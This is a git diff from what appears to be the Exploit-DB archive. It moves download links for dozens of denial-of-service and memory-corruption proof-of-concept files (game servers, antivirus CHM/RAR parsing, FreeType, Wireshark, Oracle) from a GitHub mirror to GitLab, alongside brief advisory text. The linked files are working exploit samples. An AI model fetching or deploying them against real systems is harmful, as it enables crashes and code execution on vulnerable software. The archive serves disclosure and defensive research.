empty RakNet 2.33 and prior versions released before May 30, 2005 are affected by this vulnerability. Various games employing the affected library may be vulnerable as well. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/25791.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/25791.zip \ No newline at end of file diff --git a/exploits/multiple/dos/2587.txt b/exploits/multiple/dos/2587.txt index d340fc8a5..1277a4e98 100644 --- a/exploits/multiple/dos/2587.txt +++ b/exploits/multiple/dos/2587.txt @@ -3,6 +3,6 @@ Damian Put pucik[at]gazeta.pl pucik[@]overflow.pl http://overflow.pl -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2587.exe.bz2 (10172006-clam_petite_heap.exe.bz2 # milw0rm.com [2006-10-17] \ No newline at end of file diff --git a/exploits/multiple/dos/27108.txt b/exploits/multiple/dos/27108.txt index e2df05228..44eaea76b 100644 --- a/exploits/multiple/dos/27108.txt +++ b/exploits/multiple/dos/27108.txt @@ -8,4 +8,4 @@ Successful exploitation can allow attackers to trigger a denial of service condi Dual DHCP DNS Server 1.0 is reported to be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27108.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27108.zip \ No newline at end of file diff --git a/exploits/multiple/dos/27140.txt b/exploits/multiple/dos/27140.txt index b60c09776..751564ab4 100644 --- a/exploits/multiple/dos/27140.txt +++ b/exploits/multiple/dos/27140.txt @@ -6,4 +6,4 @@ This issue allows attackers to crash applications that use the affected library This issue is present in Exiv2 versions prior to 0.9. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27140.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27140.jpg \ No newline at end of file diff --git a/exploits/multiple/dos/27365.txt b/exploits/multiple/dos/27365.txt index 4b3d2c254..a32cd8263 100644 --- a/exploits/multiple/dos/27365.txt +++ b/exploits/multiple/dos/27365.txt @@ -4,4 +4,4 @@ The Monopd game server is prone to a remote denial-of-service vulnerability. A remote attacker may exploit this issue to deny service for legitimate users. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27365.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27365.zip \ No newline at end of file diff --git a/exploits/multiple/dos/27547.txt b/exploits/multiple/dos/27547.txt index 94429f8b5..4e49d4d38 100644 --- a/exploits/multiple/dos/27547.txt +++ b/exploits/multiple/dos/27547.txt @@ -9,4 +9,4 @@ A remote denial of service condition also affects the server. ZDaemon 1.08.01 and prior versions are affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27547.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27547.zip \ No newline at end of file diff --git a/exploits/multiple/dos/27993.txt b/exploits/multiple/dos/27993.txt index 81f7f3a88..7fc7ed87d 100644 --- a/exploits/multiple/dos/27993.txt +++ b/exploits/multiple/dos/27993.txt @@ -6,4 +6,4 @@ This issue allows remote attackers to crash applications that use the affected l FreeType versions prior to 2.2.1 are vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/27993.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/27993.zip \ No newline at end of file diff --git a/exploits/multiple/dos/28345.txt b/exploits/multiple/dos/28345.txt index a2bb4f016..1b52a4239 100644 --- a/exploits/multiple/dos/28345.txt +++ b/exploits/multiple/dos/28345.txt @@ -8,4 +8,4 @@ An attacker can exploit this issue to crash the server, causing a denial-of-serv Version 0.7.0, CVS July 30th 2006 and prior versions are vulnerable to this issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28345.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28345.zip \ No newline at end of file diff --git a/exploits/multiple/dos/28666.txt b/exploits/multiple/dos/28666.txt index f5b062f20..7d0ca6b62 100644 --- a/exploits/multiple/dos/28666.txt +++ b/exploits/multiple/dos/28666.txt @@ -4,4 +4,4 @@ Call of Duty server is prone to a remote buffer-overflow vulnerability because i Exploiting this issue may allow remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely cause denial-of-service conditions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/28666.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/28666.zip \ No newline at end of file diff --git a/exploits/multiple/dos/2910.txt b/exploits/multiple/dos/2910.txt index 663fd9456..42538fd25 100644 --- a/exploits/multiple/dos/2910.txt +++ b/exploits/multiple/dos/2910.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM File Heap Overflow Vulnerability -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2910.chm (12092006-sophos_chunkheap.chm) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2910.chm (12092006-sophos_chunkheap.chm) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/exploits/multiple/dos/2911.txt b/exploits/multiple/dos/2911.txt index 71d88fed7..5ecc3082e 100644 --- a/exploits/multiple/dos/2911.txt +++ b/exploits/multiple/dos/2911.txt @@ -1,5 +1,5 @@ Sophos Antivirus CHM Chunk Name Length Memory Corruption Vulnerability -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2911.chm (12092006-sophos_namelen.chm) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2911.chm (12092006-sophos_namelen.chm) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/exploits/multiple/dos/2912.txt b/exploits/multiple/dos/2912.txt index 4c5b3c00b..bc2ada57f 100644 --- a/exploits/multiple/dos/2912.txt +++ b/exploits/multiple/dos/2912.txt @@ -1,5 +1,5 @@ Multiple Vendor Antivirus RAR File Denial of Service Vulnerability -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/2912.rar (12102006-sophos_intifiniti.rar) +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/2912.rar (12102006-sophos_intifiniti.rar) # milw0rm.com [2006-12-10] \ No newline at end of file diff --git a/exploits/multiple/dos/30139.c b/exploits/multiple/dos/30139.c index d9ee8c235..1163f4246 100644 --- a/exploits/multiple/dos/30139.c +++ b/exploits/multiple/dos/30139.c @@ -107,4 +107,4 @@ int main(int argc,char **argv) printf("\nTEST FAILED!\n"); return 1; -} +} \ No newline at end of file diff --git a/exploits/multiple/dos/30498.txt b/exploits/multiple/dos/30498.txt index 476957fff..d8b7c0c26 100644 --- a/exploits/multiple/dos/30498.txt +++ b/exploits/multiple/dos/30498.txt @@ -4,4 +4,4 @@ Live For Speed is prone to four vulnerabilities, including buffer-overflow and d Successful exploits could allow attackers to execute arbitrary code or to crash game servers. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30498.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30498.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30513.txt b/exploits/multiple/dos/30513.txt index 5a4f65d81..35eafbfaa 100644 --- a/exploits/multiple/dos/30513.txt +++ b/exploits/multiple/dos/30513.txt @@ -8,5 +8,5 @@ Versions of Unreal Engine that are included in Unreal Tournament 2003 and 2004 a This vulnerability also affects America's Army 2.8.2 when Punkbuster is enabled on the local server; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30513-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30513-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30513-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30513-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30519.txt b/exploits/multiple/dos/30519.txt index 30bec8c17..878beb869 100644 --- a/exploits/multiple/dos/30519.txt +++ b/exploits/multiple/dos/30519.txt @@ -4,4 +4,4 @@ Asura Engine is prone to a remote stack-based buffer-overflow vulnerability beca An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30519.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30519.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30524.txt b/exploits/multiple/dos/30524.txt index 999f9803a..6f0d0d13f 100644 --- a/exploits/multiple/dos/30524.txt +++ b/exploits/multiple/dos/30524.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash game serve Soldat 1.4.2 and Soldat dedicated server 2.6.2 are vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30524.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30524.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30529.txt b/exploits/multiple/dos/30529.txt index 8bd86b9d2..e1f420f75 100644 --- a/exploits/multiple/dos/30529.txt +++ b/exploits/multiple/dos/30529.txt @@ -8,4 +8,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary Media Player Classic 6.4.9.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30529.fli \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30529.fli \ No newline at end of file diff --git a/exploits/multiple/dos/30540.txt b/exploits/multiple/dos/30540.txt index 980071e9c..79b09df25 100644 --- a/exploits/multiple/dos/30540.txt +++ b/exploits/multiple/dos/30540.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to crash the affected application, denying serv This issue affects StarCraft Brood War 1.15.1; prior versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30540.scm \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30540.scm \ No newline at end of file diff --git a/exploits/multiple/dos/30566.txt b/exploits/multiple/dos/30566.txt index 0c5b5cfd8..fc0135317 100644 --- a/exploits/multiple/dos/30566.txt +++ b/exploits/multiple/dos/30566.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary Alien Arena 2007 6.10 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30566.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30566.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30574.txt b/exploits/multiple/dos/30574.txt index e9095050d..f7996b772 100644 --- a/exploits/multiple/dos/30574.txt +++ b/exploits/multiple/dos/30574.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues will allow an attacker to execute arbitrary CellFactor: Revolution 1.03 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30574.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30574.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30779.txt b/exploits/multiple/dos/30779.txt index 3c0eda70c..f567ee8bf 100644 --- a/exploits/multiple/dos/30779.txt +++ b/exploits/multiple/dos/30779.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to execute arbitrary code within the contex This issue affects Rigs of Rods 0.33d and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30779.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30779.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30791.txt b/exploits/multiple/dos/30791.txt index 4a16f6194..5a73e841f 100644 --- a/exploits/multiple/dos/30791.txt +++ b/exploits/multiple/dos/30791.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to cause a remote denial-of-service condit These issues affect versions prior to I Hear U 0.5.7. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30791.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30791.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30856.txt b/exploits/multiple/dos/30856.txt index 8230fb803..744da4456 100644 --- a/exploits/multiple/dos/30856.txt +++ b/exploits/multiple/dos/30856.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to upload files to Easy File Sharing Web Server 4.5 is vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30856.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30856.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30943.txt b/exploits/multiple/dos/30943.txt index 3a4c9ab9e..f38edaca5 100644 --- a/exploits/multiple/dos/30943.txt +++ b/exploits/multiple/dos/30943.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code in the context of a Libnemesi 0.6.4-rc1 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30943.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30943.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30989.txt b/exploits/multiple/dos/30989.txt index 1d5aaa568..05e96d313 100644 --- a/exploits/multiple/dos/30989.txt +++ b/exploits/multiple/dos/30989.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to exhaust the maximum number of connections al FortressSSH 5.0 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30989.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30989.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30990.txt b/exploits/multiple/dos/30990.txt index 2c063bedb..d340bc9e4 100644 --- a/exploits/multiple/dos/30990.txt +++ b/exploits/multiple/dos/30990.txt @@ -6,5 +6,5 @@ An attacker can exploit this issue to crash the affected application, denying se This issue affects Foxit WAC Server 2.0 Build 3503 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30990-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30990-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30990-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30990-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/30991.txt b/exploits/multiple/dos/30991.txt index 4fcbeda16..3a020a8f3 100644 --- a/exploits/multiple/dos/30991.txt +++ b/exploits/multiple/dos/30991.txt @@ -6,4 +6,4 @@ Attackers can leverage this issue to terminate the server and cause denial-of-se This issue affects Pragma TelnetServer 7.0 Build 4 Revision 589; other versions may also be vulnerable. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/30991.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/30991.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31136.txt b/exploits/multiple/dos/31136.txt index e08267aff..17a939690 100644 --- a/exploits/multiple/dos/31136.txt +++ b/exploits/multiple/dos/31136.txt @@ -15,4 +15,4 @@ cyanPrintIP Workstation 4.10.836 and prior cyanPrintIP Standard 4.10.940 and prior cyanPrintIP Basic 4.10.1030 and prior -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31136.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31136.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31148.txt b/exploits/multiple/dos/31148.txt index a114f5a75..16b408f6c 100644 --- a/exploits/multiple/dos/31148.txt +++ b/exploits/multiple/dos/31148.txt @@ -13,4 +13,4 @@ cyanPrintIP Workstation 4.10.936 and prior cyanPrintIP Standard 4.10.940 and prior cyanPrintIP Basic 4.10.1030 and prior -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31148.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31148.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31150.txt b/exploits/multiple/dos/31150.txt index e0e8baec6..f07e76e40 100644 --- a/exploits/multiple/dos/31150.txt +++ b/exploits/multiple/dos/31150.txt @@ -6,4 +6,4 @@ An attacker may exploit this issue to execute arbitrary code or cause denial-of- The issue affects RPM Elite and Select 4.5.1.11 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31150.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31150.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31232.txt b/exploits/multiple/dos/31232.txt index 1f998f906..825ae3f92 100644 --- a/exploits/multiple/dos/31232.txt +++ b/exploits/multiple/dos/31232.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue may allow remote attackers to execute arbitra This issue affects WAC Server 2.0 Build 3503 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31232.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31232.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31271.txt b/exploits/multiple/dos/31271.txt index dcf6dee98..3520823b1 100644 --- a/exploits/multiple/dos/31271.txt +++ b/exploits/multiple/dos/31271.txt @@ -6,4 +6,4 @@ A successful exploit will allow remote attackers to execute arbitrary code in th These issues affect MobiLink 10.0.1.3629; prior versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31271.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31271.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31285.txt b/exploits/multiple/dos/31285.txt index 6e5627302..9aa4438bf 100644 --- a/exploits/multiple/dos/31285.txt +++ b/exploits/multiple/dos/31285.txt @@ -6,4 +6,4 @@ A successful exploit may allow remote attackers to execute arbitrary code in the These issues affect ZIM Server 2.0 and 2.1; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31285.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31285.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31327.txt b/exploits/multiple/dos/31327.txt index cb87aefd0..ef73b5edc 100644 --- a/exploits/multiple/dos/31327.txt +++ b/exploits/multiple/dos/31327.txt @@ -8,5 +8,5 @@ NOTE: The StarTeam MPX vulnerabilities may actually be related to a TIBCO SmartS Borland StarTeam Server 2008 and MPX products are vulnerable to these issues; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31327-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31327-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31327-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31327-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31343.txt b/exploits/multiple/dos/31343.txt index e858fd8d1..100a3e0f7 100644 --- a/exploits/multiple/dos/31343.txt +++ b/exploits/multiple/dos/31343.txt @@ -13,4 +13,4 @@ SDK and JRE prior to 1.3.1_22 This vulnerability was previously covered in BID 28083 (Sun Java SE Multiple Security Vulnerabilities), but has been given its own record to better document the issue. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31343.jpg \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31343.jpg \ No newline at end of file diff --git a/exploits/multiple/dos/31542.txt b/exploits/multiple/dos/31542.txt index 7f4e8b7a2..b7af60616 100644 --- a/exploits/multiple/dos/31542.txt +++ b/exploits/multiple/dos/31542.txt @@ -6,4 +6,4 @@ Attackers can exploit these issues to execute arbitrary code or to deny service solidDB 06.00.1018 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31542.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31542.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31728.txt b/exploits/multiple/dos/31728.txt index 444a60193..131b6def3 100644 --- a/exploits/multiple/dos/31728.txt +++ b/exploits/multiple/dos/31728.txt @@ -6,6 +6,6 @@ An attacker can exploit this issue to crash the affected application, denying se Call of Duty 4 1.5 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31728-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31728-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31728-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31728-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31932.txt b/exploits/multiple/dos/31932.txt index 7b0e24b6d..9e26335ce 100644 --- a/exploits/multiple/dos/31932.txt +++ b/exploits/multiple/dos/31932.txt @@ -6,4 +6,4 @@ A successful attack will deny service to legitimate users. Skulltag 0.97d2-RC3 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31932.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31932.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31957.txt b/exploits/multiple/dos/31957.txt index fb0e0879f..decf9e48e 100644 --- a/exploits/multiple/dos/31957.txt +++ b/exploits/multiple/dos/31957.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects World in Conflict 1.008; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31957.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31957.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31958.txt b/exploits/multiple/dos/31958.txt index 7a1140138..21f99de36 100644 --- a/exploits/multiple/dos/31958.txt +++ b/exploits/multiple/dos/31958.txt @@ -6,4 +6,4 @@ Successfully exploiting these issues allows remote attackers to crash affected g SunAge 1.08.1 is vulnerable; previous versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31958.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31958.zip \ No newline at end of file diff --git a/exploits/multiple/dos/31998.txt b/exploits/multiple/dos/31998.txt index 45da1a438..71106d614 100644 --- a/exploits/multiple/dos/31998.txt +++ b/exploits/multiple/dos/31998.txt @@ -10,4 +10,4 @@ An attacker can exploit these issues to execute arbitrary code within the contex S.T.A.L.K.E.R Shadow of Chernobyl 1.0006 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/31998.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/31998.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32006.txt b/exploits/multiple/dos/32006.txt index 901560239..aead656aa 100644 --- a/exploits/multiple/dos/32006.txt +++ b/exploits/multiple/dos/32006.txt @@ -6,6 +6,6 @@ Exploiting these issues may allow attackers to obtain potentially sensitive info These issues affect Wireshark 0.9.5 up to and including 1.0.0. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32006-1.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32006-2.pcap -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32006-3.pcap \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32006-1.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32006-2.pcap +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32006-3.pcap \ No newline at end of file diff --git a/exploits/multiple/dos/32104.txt b/exploits/multiple/dos/32104.txt index 702e43ab9..bcbd2f976 100644 --- a/exploits/multiple/dos/32104.txt +++ b/exploits/multiple/dos/32104.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects ZDaemon 1.08.07 and earlier versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32104.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32104.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32125.txt b/exploits/multiple/dos/32125.txt index cae9d12c1..8819dbe7b 100644 --- a/exploits/multiple/dos/32125.txt +++ b/exploits/multiple/dos/32125.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash the affected application, denying This issue affects Unreal Tournament 2004 v3369 and prior versions. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32125.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32125.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32127.txt b/exploits/multiple/dos/32127.txt index bcea02042..f0d76997c 100644 --- a/exploits/multiple/dos/32127.txt +++ b/exploits/multiple/dos/32127.txt @@ -9,4 +9,4 @@ These issues affect the following versions: Unreal Tournament 3 1.3beta4 Unreal Tournament 3 1.2 and prior -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32127.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32127.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32192.txt b/exploits/multiple/dos/32192.txt index 4de8014c1..17bd8847a 100644 --- a/exploits/multiple/dos/32192.txt +++ b/exploits/multiple/dos/32192.txt @@ -6,5 +6,5 @@ An attacker may exploit these issues to crash the affected application, denying Halo: Combat Evolved 1.0.7.0615 is vulnerable; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32192-1.zip -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32192-2.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32192-1.zip +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32192-2.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32362.txt b/exploits/multiple/dos/32362.txt index d372a8676..ebac88483 100644 --- a/exploits/multiple/dos/32362.txt +++ b/exploits/multiple/dos/32362.txt @@ -6,4 +6,4 @@ An attacker could exploit this issue to crash applications that use the vulnerab This issue affects Unreal Engine 3; other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32362.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32362.zip \ No newline at end of file diff --git a/exploits/multiple/dos/32386.txt b/exploits/multiple/dos/32386.txt index eaec90e96..7850b3c8f 100644 --- a/exploits/multiple/dos/32386.txt +++ b/exploits/multiple/dos/32386.txt @@ -15,4 +15,4 @@ WarPath Postal 2 Shadow Ops -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/32386.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/32386.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33080.txt b/exploits/multiple/dos/33080.txt index 6d486d285..de642863c 100644 --- a/exploits/multiple/dos/33080.txt +++ b/exploits/multiple/dos/33080.txt @@ -6,4 +6,4 @@ The vulnerability can be exploited over the 'Oracle Net' protocol. An attacker d Successfully exploiting this issue will allow the attacker to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33080.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33080.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33083.txt b/exploits/multiple/dos/33083.txt index e7bc9c1b2..3777e96da 100644 --- a/exploits/multiple/dos/33083.txt +++ b/exploits/multiple/dos/33083.txt @@ -14,4 +14,4 @@ Oracle11g 11.1.0.7 Other versions may also be affected. -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/33083.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/33083.zip \ No newline at end of file diff --git a/exploits/multiple/dos/33099.txt b/exploits/multiple/dos/33099.txt index dda045d2c..2781277ae 100644 --- a/exploits/multiple/dos/33099.txt +++ b/exploits/multiple/dos/33099.txt @@ -6,4 +6,4 @@ An attacker could exploit this 